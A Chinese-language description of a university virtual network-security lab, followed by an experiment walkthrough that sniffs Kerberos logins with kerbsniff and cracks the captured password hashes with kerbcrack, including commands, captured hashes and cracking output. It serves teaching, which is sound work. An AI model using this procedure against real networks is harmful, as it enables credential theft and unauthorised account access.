网络安全原理与技术仿真系统是针对《网络安全原理与技术》实验课程配套开发的可在网上开展网络安全攻防实验的虚拟实验教学系统。网络安全课程的实验课程涉及对靶机的攻击和网络中数据的抓取分析。要构建一个真实的实验系统,是需要较多的硬件设备,并且可扩展性差。因此,网络安全攻防实验仿真平台和虚拟知识点教学平台非常必要。本实验室的虚拟实验平台分为攻防实验系统和知识点训练教学平台。仿真平台采用在每台电脑上部署硬件设备,构建虚拟靶机,并可以虚拟网络协议的数据抓取分析。虚拟系统提供与真实网络相同的构架,学生可对网络数据进行截取和分析,对靶机上的防火墙进行攻击等操作。
实验项目简介:
嗅探并破解 Kerberos
如果企业在使用 Kerberos 认证,黑客仍然可以嗅探并破解口令,只是方法各有不同。用kerbsniff 监听网络,并捕获系统的 Kerberos 登录并将其存储为文件。然后,kerbcrack 处理捕获文件,并使用蛮力或字典攻击来破解口令,过程简单。实现过程: C:\kerb>kerbsniff GrayHat.out
KerbSniff 1.2 - (c) 2002, Arne Vidstrom
- http://ntsecurity.nu/toolbox/kerbcrack/
Captured packets: **^c
kerbsniff 捕获的“*”是两个 Kerberos 认证序列。将“*”保存到文件 GrayHat.out 中:
C:\kerb>type GrayHat.out
test
GrayHat
36ED42F5B86F2CA7F236A9E2FAB2498C39A1729A75351C389F7AADB2BBC7C85876E0BAB9
1A47CADA45861665A2D022BA4D214A52
#
test1
GrayHat
2AA32BB9E29CFBBA206FAEB15FB7F73A846B57C20804831450663CDF160657296B2F4AF2
AFE36CD4F51D533EBBF4619838F4EC4A
#
可以见到,输出文件中列出了用户名、用户所在的域和在通信数据中捕获的口令的 Kerberos 散列值。破解口令
kerbcrack不能提供混合破解,只能进行蛮力或字典攻击。
Kerbcrack破解:
+-+-C:\kerb>dir /b *english*
words-english
C:\kerb>kerbcrack
KerbCrack 1.2 - (c) 2002, Arne Vidstrom
- http://ntsecurity.nu/toolbox/kerbcrack/
Usage: kerbcrack <capture file> <crack mode> [dictionary file] [password size]
crack modes:
-b1 = brute force attack with (a-z, A-Z)
-b2 = brute force attack with (a-z, A-Z, 0-9)
-b3 = brute force attack with (a-z, A-Z, 0-9, special characters)
-b4 = b1 + swedish letters
-b5 = b2 + swedish letters
-b6 = b3 + swedish letters
-d = dictionary attack with specified dictionary file
C:\kerb>kerbcrack GrayHat.out -d words-english
KerbCrack 1.2 - (c) 2002, Arne Vidstrom
- http://ntsecurity.nu/toolbox/kerbcrack/
Loaded capture file.
Currently working on:
Account name - test1
From domain - GrayHat
Trying password – test
Number of cracked passwords this far: 1
Done.
C:\kerb>